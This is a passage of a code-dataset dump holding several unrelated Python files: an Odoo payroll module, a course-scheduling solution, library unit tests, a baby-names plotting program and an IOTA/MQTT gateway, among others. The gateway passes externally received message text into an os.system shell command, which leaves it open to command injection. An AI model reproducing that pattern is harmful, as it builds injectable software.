'account_id': acc_id,\n 'journal_id': slip.journal_id.id,\n 'date': date,\n 'debit': currency.round(credit_sum - debit_sum),\n 'credit': 0.0,\n })\n line_ids.append(adjust_debit)\n move_dict['line_ids'] = line_ids\n move = self.env['account.move'].create(move_dict)\n slip.write({'move_id': move.id, 'date': date})\n move.action_post()\n return True\n\n @api.model\n def _get_payslip_lines_by_holiday(self, contract_ids, payslip_id):\n\n def _sum_salary_rule_category(localdict, category, amount):\n if category.parent_id:\n localdict = _sum_salary_rule_category(localdict, category.parent_id, amount)\n\n if category.code in localdict['categories'].dict:\n localdict['categories'].dict[category.code] += amount\n else:\n localdict['categories'].dict[category.code] = amount\n\n return localdict\n\n class BrowsableObject(object):\n def __init__(self, employee_id, dict, env):\n self.employee_id = employee_id\n self.dict = dict\n self.env = env\n\n def __getattr__(self, attr):\n return attr in self.dict and self.dict.__getitem__(attr) or 0.0\n\n class InputLine(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(amount) as sum\n FROM hr_payslip as hp, hr_payslip_input as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()[0] or 0.0\n\n class WorkedDays(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def _sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(number_of_days) as number_of_days, sum(number_of_hours) as number_of_hours\n FROM hr_payslip as hp, hr_payslip_worked_days as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()\n\n def sum(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[0] or 0.0\n\n def sum_hours(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[1] or 0.0\n\n class Payslips(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"SELECT sum(case when hp.credit_note = False then (pl.total) else (-pl.total) end)\n FROM hr_payslip as hp, hr_payslip_line as pl\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pl.slip_id AND pl.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n res = self.env.cr.fetchone()\n return res and res[0] or 0.0\n\n # we keep a dict with the result because a value can be overwritten by another rule with the same code\n result_dict = {}\n rules_dict = {}\n worked_days_dict = {}\n inputs_dict = {}\n blacklist = []\n payslip = self.env['hr.payslip'].browse(payslip_id)\n for worked_days_line in payslip.worked_days_line_ids:\n worked_days_dict[worked_days_line.code] = worked_days_line\n for input_line in payslip.input_line_ids:\n inputs_dict[input_line.code] = input_line\n\n categories = BrowsableObject(payslip.employee_id.id, {}, self.env)\n inputs = InputLine(payslip.employee_id.id, inputs_dict, self.env)\n worked_days = WorkedDays(payslip.employee_id.id, worked_days_dict, self.env)\n payslips = Payslips(payslip.employee_id.id, payslip, self.env)\n rules = BrowsableObject(payslip.employee_id.id, rules_dict, self.env)\n\n baselocaldict = {'categories': categories, 'rules': rules, 'payslip': payslips, 'worked_days': worked_days,\n 'inputs': inputs}\n # get the ids of the structures on the contracts and their parent id as well\n contracts = self.env['hr.contract'].browse(contract_ids)\n if len(contracts) == 1 and payslip.struct_id:\n structure_ids = list(set(payslip.struct_id._get_parent_structure().ids))\n else:\n structure_ids = contracts.get_all_structures()\n # get the rules of the structure and thier children\n rule_ids = self.env['hr.payroll.structure'].browse(structure_ids).get_all_rules()\n # run the rules by sequence\n sorted_rule_ids = [id for id, sequence in sorted(rule_ids, key=lambda x: x[1])]\n sorted_rules = self.env['hr.salary.rule'].browse(sorted_rule_ids)\n\n sorted_rules = sorted_rules.filtered(lambda l: l.in_holiday)\n\n for contract in contracts:\n employee = contract.employee_id\n localdict = dict(baselocaldict, employee=employee, contract=contract)\n for rule in sorted_rules:\n key = rule.code + '-' + str(contract.id)\n localdict['result'] = None\n localdict['result_qty'] = 1.0\n localdict['result_rate'] = 100\n # check if the rule can be applied\n if rule._satisfy_condition(localdict) and rule.id not in blacklist:\n # compute the amount of the rule\n amount, qty, rate = rule._compute_rule(localdict)\n # check if there is already a rule computed with that code\n previous_amount = rule.code in localdict and localdict[rule.code] or 0.0\n if rule.per_day and worked_days.PAID100:\n amount = (amount / WORK_DAY_PER_MONTH) * worked_days.PAID100.number_of_days\n # set/overwrite the amount computed for this rule in the localdict\n tot_rule = amount * qty * rate / 100.0\n localdict[rule.code] = tot_rule\n rules_dict[rule.code] = rule\n # sum the amount for its salary category\n localdict = _sum_salary_rule_category(localdict, rule.category_id, tot_rule - previous_amount)\n # create/overwrite the rule in the temporary results\n result_dict[key] = {\n 'salary_rule_id': rule.id,\n 'contract_id': contract.id,\n 'name': rule.name,\n 'code': rule.code,\n 'category_id': rule.category_id.id,\n 'sequence': rule.sequence,\n 'appears_on_payslip': rule.appears_on_payslip,\n 'condition_select': rule.condition_select,\n 'condition_python': rule.condition_python,\n 'condition_range': rule.condition_range,\n 'condition_range_min': rule.condition_range_min,\n 'condition_range_max': rule.condition_range_max,\n 'amount_select': rule.amount_select,\n 'amount_fix': rule.amount_fix,\n 'amount_python_compute': rule.amount_python_compute,\n 'amount_percentage': rule.amount_percentage,\n 'amount_percentage_base': rule.amount_percentage_base,\n 'register_id': rule.register_id.id,\n 'amount': amount,\n 'employee_id': contract.employee_id.id,\n 'quantity': qty,\n 'rate': rate,\n }\n else:\n # blacklist this rule and its children\n blacklist += [id for id, seq in rule._recursive_search_of_rules()]\n\n return list(result_dict.values())\n\n\nclass HrPayslipRun(models.Model):\n _inherit = 'hr.payslip.run'\n\n state = fields.Selection([\n ('draft', 'Draft'),\n ('done', 'Done'),\n ('paid', 'Paid'),\n ('close', 'Close'),\n ], string='Status', index=True, readonly=True, copy=False, default='draft')\n batch_net_total = fields.Float('Batch Total NET', readonly=True)\n description = fields.Text('Description', readonly=True, states={'draft': [('readonly', False)]})\n credit_note = fields.Boolean(\n string='Credit Note',\n states={'draft': [('readonly', False)]},\n help=\"Indicates this payslip has a refund of another\")\n\n \n def _compute_attachment_number(self):\n for payslip in self:\n payslip.attachment_number = self.env['ir.attachment'].search_count(\n [('res_model', '=', 'hr.payslip.run'), ('res_id', '=', payslip.id)])\n\n \n def open_attach_wizard(self):\n view_id = self.env.ref('bsg_hr_payroll.view_attachment_payslip_batch_form').id\n default_name = \"مرفقات دفعة\" + \" \" + str(self.name)\n\n return {\n 'name': _('Attachments'),\n 'res_model': 'ir.attachment',\n 'view_type': 'form',\n 'context': \"{'default_name': '%s','default_res_model': '%s','default_res_id': %d}\" % (\n default_name, self._name, self.id),\n 'type': 'ir.actions.act_window',\n 'views': [(view_id, 'form')],\n 'view_id': view_id,\n 'target': 'new',\n }\n\n \n def action_get_attachment_view(self):\n self.ensure_one()\n res = self.env['ir.actions.act_window']._for_xml_id('bsg_hr_payroll.action_attachment')\n return res\n\n attachment_number = fields.Integer('Number of Attachments', compute='_compute_attachment_number')\n\n \n def confirm_payslip_run(self):\n for rec in self:\n if rec.state != 'draft':\n ValidationError(_(\"You can only confirm batches in 'Draft' state!\"))\n for slip in rec.slip_ids:\n if slip.state == 'draft':\n slip.with_context({'no_compute': True}).action_payslip_done()\n return self.write({'state': 'done'})\n\n \n def compute_payslip_run(self):\n for rec in self:\n if not rec.slip_ids:\n ValidationError(\"Please generate payslips first!\")\n if rec.state != 'draft':\n ValidationError(_(\"You may only compute batches in 'Draft' state!\"))\n for slip in rec.slip_ids:\n if slip.state == 'draft':\n slip.with_context({'no_batch_total_update': True}).compute_sheet()\n net_total = sum(rec.slip_ids.mapped('total_net'))\n rec.batch_net_total = net_total\n return True\n\n \n def unlink(self):\n for rec in self:\n if rec.state == 'done':\n raise ValidationError(_(\"You can not delete confimed batches!\"))\n if rec.slip_ids:\n if 'done' in rec.slip_ids.mapped('state'):\n raise ValidationError(_(\"You can't delete a batch that has confirmed payslips!\"))\n else:\n rec.slip_ids.unlink()\n super(HrPayslipRun, self).unlink()\n return True\n\n # @api.constrains('slip_ids')\n # def _trigger_slip_ids(self):\n # for rec in self:\n # rec.sudo().compute_payslip_run()\n\n\nclass AccountMove(models.Model):\n _inherit = \"account.move\"\n\n payslip_run_id = fields.Many2one('hr.payslip', string='Payslip Batch', copy=False, help=\"Payslip Expense\",\n readonly=True)\n\n\nclass AccountMoveLine(models.Model):\n _inherit = \"account.move.line\"\n\n payslip_id = fields.Many2one('hr.payslip', string='Payslip', copy=False, help=\"Payslip Expense\", readonly=True)\n\n def reconcile(self):\n res = super().reconcile()\n account_move_ids = [l.move_id.id for l in self]\n if account_move_ids:\n payslip = self.env['hr.payslip'].sudo().with_context(force_company=self.env.user.company_id.id,\n company_id=self.env.user.company_id.id).search([\n ('move_id', 'in', account_move_ids), ('state', '=', 'done')\n ])\n payslip.set_to_paid()\n return res\n","repo_name":"tabishturabi/S_V_16_temp_v1","sub_path":"bsg_hr_payroll/models/hr_paysilp.py","file_name":"hr_paysilp.py","file_ext":"py","file_size_in_byte":28741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29037832600","text":"class Solution:\n def minimumSemesters(self, n: int, relations: List[List[int]]) -> int:\n in_degree = [0]*(n+1)\n outdegree_map = collections.defaultdict(list)\n \n for prev, nextCourse in relations:\n outdegree_map[prev].append(nextCourse)\n in_degree[nextCourse] += 1\n \n #print(outdegree_map, in_degree)\n q = deque()\n for i, v in enumerate(in_degree):\n if v == 0 and i > 0:\n q.append((i, 1))\n\n min_sem = -1\n course_taken = 0\n while q:\n curr_class, curr_sem = q.popleft()\n course_taken += 1\n min_sem = max(curr_sem, min_sem)\n for i in outdegree_map[curr_class]:\n in_degree[i] -= 1\n if in_degree[i] == 0:\n q.append((i, curr_sem+1))\n \n \n return min_sem if course_taken == n else -1\n ","repo_name":"Hangpanbee/LeetcodeDump","sub_path":"1136-parallel-courses/1136-parallel-courses.py","file_name":"1136-parallel-courses.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"10048291455","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n:Authors: Tal Peretz\n:Date: 12/8/2016\n:TL;DR: this module is responsible for testing transformations module\n\"\"\"\n\nimport os\nimport unittest\n\nimport numpy as np\n\nfrom pyds import transformations, constants\nfrom tests import data_generators\n\n\nclass TransformationsTestCase(unittest.TestCase):\n logger = None\n is_warnings_traced = False\n\n def setUp(self):\n import traceback\n import warnings\n import sys\n import logging.config\n\n # setting log configuration\n log_conf_path = os.path.abspath(constants.LOGGER_CONFIGURATION_RELATIVE_PATH)\n logging.config.fileConfig(log_conf_path)\n self.logger = logging.getLogger(__name__)\n\n def warn_with_traceback(message, category, filename, lineno, file=None, line=None):\n traceback.print_stack()\n\n log = file if hasattr(file, 'write') else sys.stderr\n log.write(warnings.formatwarning(message, category, filename, lineno, line))\n\n if self.is_warnings_traced:\n warnings.showwarning = warn_with_traceback\n\n def test_discretize(self):\n gen_df = data_generators.generate_random_data(100, 5)\n equal_width_num_df, col_to_width_edges, equal_depth_num_df, col_to_depth_edges = transformations.discretize(\n gen_df)\n equal_width_num_df_with_predefined_bins, _, equal_depth_num_df_with_predefined_bins, _ = transformations.discretize(\n gen_df, col_to_width_edges, col_to_depth_edges)\n\n # check that equal_width_num_df and equal_depth_num_df has optimal num of bins\n for col_name in gen_df:\n self.assertEqual(len(equal_width_num_df[\"equal_w_%s\" % col_name].unique()),\n transformations._calc_optimal_num_of_bins(gen_df[col_name]))\n self.assertEqual(len(equal_depth_num_df[\"equal_d_%s\" % col_name].unique()),\n transformations._calc_optimal_num_of_bins(gen_df[col_name]))\n self.assertTrue(equal_width_num_df_with_predefined_bins.equals(equal_width_num_df))\n self.assertTrue(equal_depth_num_df_with_predefined_bins.equals(equal_depth_num_df))\n\n def test_preprocess_train_columns(self):\n hr_df = data_generators.get_hr_dataset()\n transformed_df, train_transformations = transformations.preprocess_train_columns(hr_df)\n self.assertEqual(len(hr_df.select_dtypes(include=[np.number])),\n len(transformed_df.select_dtypes(include=[np.number]))) # num of num cols hasn't changed\n self.assertGreaterEqual(len(hr_df.select_dtypes(include=['category'])),\n len(transformed_df.select_dtypes(include=['category']))) # num of cat cols is greater or equal\n\n def test_preprocess_test_columns(self):\n # run preprocess_train_columns and preprocess_test_columns on same raw data and check if the returned dataframes\n # are equal\n hr_df = data_generators.get_hr_dataset()\n transformed_train_df, train_transformations = transformations.preprocess_train_columns(hr_df)\n transformed_test_df = transformations.preprocess_test_columns(hr_df, train_transformations)\n self.assertTrue(transformed_train_df.equals(transformed_test_df))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"talperetz/pyds","sub_path":"tests/transformations_tests.py","file_name":"transformations_tests.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"15111950233","text":"\"\"\"\nSC101 Baby Names Project\nAdapted from Nick Parlante's Baby Names assignment by\nJerry Liao.\n\nYOUR DESCRIPTION HERE\n\"\"\"\n\nimport tkinter\nimport babynames\nimport babygraphicsgui as gui\n\nFILENAMES = [\n 'data/full/baby-1900.txt', 'data/full/baby-1910.txt',\n 'data/full/baby-1920.txt', 'data/full/baby-1930.txt',\n 'data/full/baby-1940.txt', 'data/full/baby-1950.txt',\n 'data/full/baby-1960.txt', 'data/full/baby-1970.txt',\n 'data/full/baby-1980.txt', 'data/full/baby-1990.txt',\n 'data/full/baby-2000.txt', 'data/full/baby-2010.txt'\n]\nCANVAS_WIDTH = 1000\nCANVAS_HEIGHT = 600\nYEARS = [1900, 1910, 1920, 1930, 1940, 1950, 1960, 1970, 1980, 1990, 2000, 2010]\nGRAPH_MARGIN_SIZE = 20\nCOLORS = ['red', 'purple', 'green', 'blue']\nTEXT_DX = 2\nLINE_WIDTH = 2\nMAX_RANK = 1000\n\n\ndef get_x_coordinate(width, year_index):\n \"\"\"\n Given the width of the canvas and the index of the current year\n in the YEARS list, returns the x coordinate of the vertical\n line associated with that year.\n\n Input:\n width (int): The width of the canvas\n year_index (int): The index of the current year in the YEARS list\n Returns:\n x_coordinate (int): The x coordinate of the vertical line associated\n with the specified year.\n \"\"\"\n x_coordinate = int(GRAPH_MARGIN_SIZE + year_index * (width - 2 * GRAPH_MARGIN_SIZE) / len(YEARS))\n return x_coordinate\n\n\ndef draw_fixed_lines(canvas):\n \"\"\"\n Erases all existing information on the given canvas and then\n draws the fixed background lines on it.\n\n Input:\n canvas (Tkinter Canvas): The canvas on which we are drawing.\n\n Returns:\n This function does not return any value.\n \"\"\"\n canvas.delete('all') # delete all existing lines from the canvas\n\n # Write your code below this line\n canvas.create_line(GRAPH_MARGIN_SIZE, GRAPH_MARGIN_SIZE, CANVAS_WIDTH - GRAPH_MARGIN_SIZE, GRAPH_MARGIN_SIZE,\n width=LINE_WIDTH)\n canvas.create_line(GRAPH_MARGIN_SIZE, CANVAS_HEIGHT - GRAPH_MARGIN_SIZE,\n CANVAS_WIDTH - GRAPH_MARGIN_SIZE, CANVAS_HEIGHT - GRAPH_MARGIN_SIZE, width=LINE_WIDTH)\n for i in range(len(YEARS)):\n year = YEARS[i]\n x_coordinate = get_x_coordinate(CANVAS_WIDTH, i)\n canvas.create_line(x_coordinate, 0, x_coordinate, CANVAS_HEIGHT, width=LINE_WIDTH)\n canvas.create_text(x_coordinate + TEXT_DX, CANVAS_HEIGHT - GRAPH_MARGIN_SIZE, text=year, anchor=tkinter.NW,\n font='courier, 16', fill='navy')\n #################################\n\n\ndef draw_names(canvas, name_data, lookup_names):\n \"\"\"\n Given a dict of baby name data and a list of name, plots\n the historical trend of those names onto the canvas.\n\n Input:\n canvas (Tkinter Canvas): The canvas on which we are drawing.\n name_data (dict): Dictionary holding baby name data\n lookup_names (List[str]): A list of names whose data you want to plot\n\n Returns:\n This function does not return any value.\n \"\"\"\n draw_fixed_lines(canvas) # draw the fixed background grid\n\n # Write your code below this line\n for i in range(len(lookup_names)):\n name = lookup_names[i]\n name_color = COLORS[i % len(COLORS)]\n if name in name_data:\n year = str(YEARS[0])\n if year in name_data[name]:\n rank = int(name_data[name][year])\n x1 = get_x_coordinate(CANVAS_WIDTH, 0)\n y1 = GRAPH_MARGIN_SIZE + ((CANVAS_HEIGHT - 2 * GRAPH_MARGIN_SIZE) / 1000) * rank\n canvas.create_text(x1 + TEXT_DX, y1, text=f'{name} {rank}', anchor=tkinter.SW, font='times, 12',\n fill=name_color)\n else:\n x1 = get_x_coordinate(CANVAS_WIDTH, 0)\n y1 = CANVAS_HEIGHT - GRAPH_MARGIN_SIZE\n canvas.create_text(x1 + TEXT_DX, y1, text=f'{name} *', anchor=tkinter.SW, font='times, 12',\n fill=name_color)\n for j in range(len(YEARS) - 1):\n year = str(YEARS[j + 1])\n if year in name_data[name]:\n rank = int(name_data[name][year])\n x2 = get_x_coordinate(CANVAS_WIDTH, j + 1)\n y2 = GRAPH_MARGIN_SIZE + ((CANVAS_HEIGHT - 2 * GRAPH_MARGIN_SIZE) / 1000) * rank\n canvas.create_text(x2 + TEXT_DX, y2, text=f'{name} {rank}', anchor=tkinter.SW, font='times, 12',\n fill=name_color)\n else:\n x2 = get_x_coordinate(CANVAS_WIDTH, j + 1)\n y2 = CANVAS_HEIGHT - GRAPH_MARGIN_SIZE\n canvas.create_text(x2 + TEXT_DX, y2, text=f'{name} *', anchor=tkinter.SW, font='times, 12',\n fill=name_color)\n canvas.create_line(x1, y1, x2, y2, width=LINE_WIDTH, fill=name_color)\n x1 = x2\n y1 = y2\n #################################\n\n\n# main() code is provided, feel free to read through it but DO NOT MODIFY\ndef main():\n # Load data\n name_data = babynames.read_files(FILENAMES)\n\n # Create the window and the canvas\n top = tkinter.Tk()\n top.wm_title('Baby Names')\n canvas = gui.make_gui(top, CANVAS_WIDTH, CANVAS_HEIGHT, name_data, draw_names, babynames.search_names)\n\n # Call draw_fixed_lines() once at startup so we have the lines\n # even before the user types anything.\n draw_fixed_lines(canvas)\n\n # This line starts the graphical loop that is responsible for\n # processing user interactions and plotting data\n top.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yutaotseng/sc-projects","sub_path":"stanCode_Projects/name_searching_system/babygraphics.py","file_name":"babygraphics.py","file_ext":"py","file_size_in_byte":5713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"5064119574","text":"#=======================================================================\n# IOTA Raspberry Pi Gateway\n#\n# This project aims to give an easy to use command for other machine to \n# interact with IOTA Tangle. \n#\n# This program can be used to give signature to the data. This method is\n# helpful to differentiate message in the same tag index by using\n# ECDSA signature.\n#\n# More information : \n# https://github.com/SuryaAssistant/iota-raspberrypi-gateway\n#\n# Apache-2.0 License\n#=======================================================================\n\n# Gateway Properties\nfrom config.config import *\nimport iota_client\n\n# ECC Digital Signature Properties\nfrom ellipticcurve import Ecdsa, PrivateKey, PublicKey, Signature\nfrom ellipticcurve.utils.file import File\n\n# Other Properties\nimport subprocess\nimport json\nimport time\nimport os\n\nclient_data = \"\"\nsend_addr = \"\"\ntangle_msg_id = \"\"\n\n#=======================================================================\n# Function to Upload Data to IOTA Tangle\n# Parameter:\n# - input_data : Series of data to be uploaded\n# - index_msg : tag index in IOTA Tangle. For easy search by tag index\n#=======================================================================\ndef upload(data, index_msg):\n timestamp = str(int(time.time()))\n encoded_data = data.encode()\n message = ('\"message\":' + '{\"timestamp\":' + timestamp + \n ',\"data\":' + data + '}')\n \n # Read private key for signature\n privateKey = PrivateKey.fromPem(File.read(\".ecc/privateKey.pem\"))\n # Create public key \n publicKey = privateKey.publicKey()\n # Create Signature\n signature = Ecdsa.sign(message, privateKey).toBase64()\n # Create JSON like format\n payload = ('{' + message + \n ',\"publicKey\":\"' + publicKey.toCompressed() + \n '\",\"signature\":\"' + signature + '\"}')\n payload_int = payload.encode(\"utf8\")\n\n # upload to tangle\n tangle_return = client.message(index=index_msg, data=payload_int)\n global tangle_msg_id\n tangle_msg_id = tangle_return['message_id']\n \n#=======================================================================\n# Function to relay data from IOTA Tangle to Subscriber via MQTT\n# Parameter:\n# - msg : message from IOTA Tangle\n# - send_topic : client subscribed topic\n#=======================================================================\ndef send_mqtt(msg, send_topic):\n shell_script = ('mosquitto_pub -h ' + mqtt_addr + ' -t \"' + \n gateway_name + '/' +\n send_topic + '\" -m \"' +\n msg + '\"')\n \n # see what send\n print('OUT ==> ' + msg)\n # call shell \n os.system(shell_script)\n\n#=======================================================================\n# Function to create and save ECDSA private key\n# Parameter: None\n#=======================================================================\ndef ECDSA_begin():\n # ECDSA CONFIG\n #if folder is not exist, create folder\n folder_path = '.ecc'\n if os.path.exists(folder_path) == False:\n os.mkdir(folder_path)\n\n #if privateKey is not exist, create pem file\n file_path = '.ecc/privateKey.pem'\n if os.path.exists(file_path) == False:\n # Create new privateKey\n privateKey = PrivateKey()\n privateKeyPem = privateKey.toPem()\n \n f = open(file_path, \"w\")\n f.write(privateKeyPem)\n f.close()\n\n#=======================================================================\n# Function to act based on input command in API\n# Parameter:\n# - command : command to do\n# - parameter_value : value to input in command\n# - return_topic : topic used to send MQTT\n#=======================================================================\ndef do_command(command, parameter_value, return_topic, set_tag=gateway_name):\n # convert compressed public key to PEM format\n if command == 'convert_to_pem':\n try :\n compressedPublicKey = parameter_value\n convert_publicKey = PublicKey.fromCompressed(compressedPublicKey)\n publicKey_pem = convert_publicKey.toPem()\n send_mqtt(publicKey_pem, return_topic)\n except ValueError :\n send_mqtt(\"Error to convert compressed public key to PEM format\", return_topic)\n \n # get data section of a message\n if command == 'data':\n try :\n parameter_value = parameter_value.replace(\"'\", '\"')\n upload(parameter_value, gateway_name)\n send_mqtt(tangle_msg_id, return_topic)\n except ValueError :\n send_mqtt(\"Error to upload to Tangle\", return_topic)\n \n # Upload data with specified tag index\n elif command == 'data_special':\n try :\n parameter_value = parameter_value.replace(\"'\", '\"')\n upload(parameter_value, set_tag)\n send_mqtt(tangle_msg_id, return_topic)\n except ValueError :\n send_mqtt(\"Error to upload to Tangle\", return_topic)\n \n # get list of message_id based on indexation name\n elif command == 'tag':\n try :\n return_data = str(client.get_message_index(parameter_value))\n except ValueError :\n return_data = \"Tag not found\"\n send_mqtt(return_data, return_topic)\n\n # Original data from IOTA Tangle\n elif command == 'msg_data':\n try : \n return_data = str(client.get_message_data(parameter_value))\n except ValueError:\n return_data = \"Message ID not found\"\n send_mqtt(return_data, return_topic)\n \n # original metadata from IOTA Tangle\n elif command == 'msg_metadata':\n try:\n return_data = str(client.get_message_metadata(parameter_value))\n except ValueError:\n return_data = \"Message ID not found\"\n send_mqtt(return_data, return_topic)\n \n # get list of message in tag index\n elif command == 'tag_msg':\n try :\n # get list of \n msg_id_list= client.get_message_index(parameter_value)\n msg_count = len(msg_id_list)\n return_data = \"[\"\n \n # get payload for every message ID\n for i in range(msg_count):\n full_data = client.get_message_data(msg_id_list[i]) \n payload_byte = full_data[\"payload\"][\"indexation\"][0][\"data\"]\n msg=''\n for x in range(len(payload_byte)):\n msg += chr(payload_byte[x])\n return_data += \"[\" + msg + \"]\"\n if i < msg_count-1:\n return_data += \",\"\n \n return_data += \"]\"\n return_data = return_data.replace('\"', \"'\")\n except ValueError :\n return_data = \"Tag not found\"\n \n send_mqtt(return_data, return_topic)\n \n # Only payload message from IOTA Tangle\n elif command == 'payload':\n try :\n # get the payload section\n full_data = client.get_message_data(parameter_value) \n payload_byte = full_data[\"payload\"][\"indexation\"][0][\"data\"]\n return_data=''\n for x in range(len(payload_byte)):\n return_data += chr(payload_byte[x])\n except ValueError:\n return_data = \"Not Valid Payload or Message ID\"\n return_data = return_data.replace('\"', \"'\")\n send_mqtt(return_data, return_topic)\n \n # Only valid message from this gateway only\n elif command == 'payload_valid':\n try : \n # get the payload section\n full_data = client.get_message_data(parameter_value) \n payload_byte = full_data[\"payload\"][\"indexation\"][0][\"data\"]\n full_message=''\n for x in range(len(payload_byte)):\n full_message += chr(payload_byte[x]) \n \n # extract message\n msg_start_index = full_message.find(\"message\") - 1\n msg_end_index = full_message.find(\"publicKey\") - 2\n message = full_message[msg_start_index:msg_end_index]\n \n # get signature\n data_json = json.loads(full_message)\n signature = data_json[\"signature\"]\n\n # get this gateway publicKey\n privateKey = PrivateKey.fromPem(File.read(\".ecc/privateKey.pem\"))\n publicKey = privateKey.publicKey()\n \n # ECDSA verifivcation\n signatureToVerify = Signature.fromBase64(signature)\n if Ecdsa.verify(message, signatureToVerify, publicKey):\n return_data = message.replace('\"', \"'\")\n else:\n return_data = \"Not a Payload from This Gateway\"\n except ValueError:\n return_data = \"Not a Valid Payload or Message ID\"\n send_mqtt(return_data, return_topic)\n \n#=======================================================================\n# Main program\n# In first run, it will:\n# - Create Random Private and Public Key\n# \n# Next, it will act based on input command from MQTT input.\n# Command List :\n# - data : upload data to IOTA Tangle. (input: JSON data)\n# - tag : get list of msg_id from input index. (input : indexation name)\n# - msg_data : get full data of msg. (input : message id)\n# - msg_metada : get metadata of msg. (input : message id)\n# - payload : get payload of message. (input : message id)\n# - payload_valid : get payload of message that uploaded via \n# this gateway. (input: message_id)\n#=======================================================================\nif __name__ == \"__main__\":\n # Configure ECDSA\n ECDSA_begin()\n \n # Test connection with permanode\n client = iota_client.Client(nodes_name_password=[[chrysalis_url]])\n print(client.get_info())\n \n # Stop previous sesion\n # It is necessary to prevent duplicate input message in temp.txt\n os.system('pkill -f server-mqtt.py')\n subprocess.Popen([\"python3\", \"server-mqtt.py\"])\n \n while True:\n # Open temp.txt API\n f = open(\"temp.txt\", \"r+\")\n answer_line = f.readline().strip('\\n')\n \n # if none, skip to restart\n if answer_line == \"\":\n continue\n\n # if there is message to act,\n # read the first row and delete it\n lines = f.readlines()\n f.seek(0)\n f.truncate()\n f.writelines(lines[1:])\n f.close()\n \n # if the message command format is not fulfilled, skip\n # format must be \"command/data_parameter/mqtt_return_topic\"\n # if the format is correct, parse message command as 3 parameter\n if '/' not in answer_line:\n continue\n \n parsing_data = answer_line.split('/')\n \n if len(parsing_data) != 3 and len(parsing_data) != 4:\n continue\n \n # Three command style\n if len(parsing_data) == 3:\n input_command = parsing_data[0]\n input_parameter_value = parsing_data[1]\n topic = parsing_data[2].strip(\"'\")\n specified_tag = gateway_name\n\n # Four command style\n if len(parsing_data) == 4:\n input_command = parsing_data[0]\n specified_tag = parsing_data[1]\n input_parameter_value = parsing_data[2]\n topic = parsing_data[3].strip(\"'\")\n \n # Do message based on it command function\n do_command(input_command, input_parameter_value, topic, specified_tag)\n","repo_name":"SuryaAssistant/iota-raspberrypi-gateway","sub_path":"src/armv7l/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"16393441936","text":"from printStyle import *\n\n\nclass Translation:\n def __init__(self, path=\"Data/languages.csv\"):\n try:\n with open(path, \"r\", encoding=\"utf-8-sig\") as f:\n self.lines = f.read()\n self.lines = self.lines.split(\"\\n\")\n self.lines = [line.split(\",\") for line in self.lines]\n self.languageList = self.lines[0]\n except FileNotFoundError:\n printError(f\"File {path} not found. App will be using English\")\n self.lines = []\n self.languageList = []\n\n def Translate(self, language, text):\n try:\n index = self.languageList.index(language)\n try:\n for line in self.lines:\n if line[0] == text:\n return line[index]\n printWarning(f\"Text {text} not found. Returning english text\")\n return text\n except IndexError:\n printWarning(f\"Text {text} not found. Returning english text\")\n return text\n except ValueError:\n if self.languageList:\n printWarning(f\"Language {language} not found. Returning english text\")\n else:\n printWarning(f\"Language {language} not found as CSV couldn't be found. Returning english text\")\n return text\n","repo_name":"MM4096/Translator","sub_path":"translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21806601654","text":"def mood():\n print(\"How are you?\")\n\nprint(\"Lalalal\")\nprint(\"Dzień dobry\")\nmood()\nmood()\nmood()\n\n\ndef my_mood(answear):\n print(\"My mood today:\")\n print(answear)\n\nresp = input(\"How are you?\")\nmy_mood(resp)\n\ndef my_mood(answear):\n return answear * 2\n\n\nresp = input(\"How are you?\")\ntwiced = my_mood(resp)\nprint(\"My mood is like\", twiced)\n","repo_name":"damiankiwi/kurs_python","sub_path":"04_functions/FUNCTIONS.py","file_name":"FUNCTIONS.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34843527948","text":"from data import load_certificate, load_wav_16k_mono\n\nimport tensorflow as tf\n\n\ndef inference():\n true = 0\n false = 0\n flag = true\n result_csv_path = \"./result.csv\"\n new = open(result_csv_path, \"a\")\n new.write(\"filename,ground truth,predicted,result\\n\")\n\n sleep_scoring_path = 'C:/Users/AllyHyeseongKim/PycharmProjects/Sleep-Stage-Classification/certificate/dataset/audio/'\n dataset, map_classes = load_certificate(path=sleep_scoring_path)\n print(dataset)\n\n 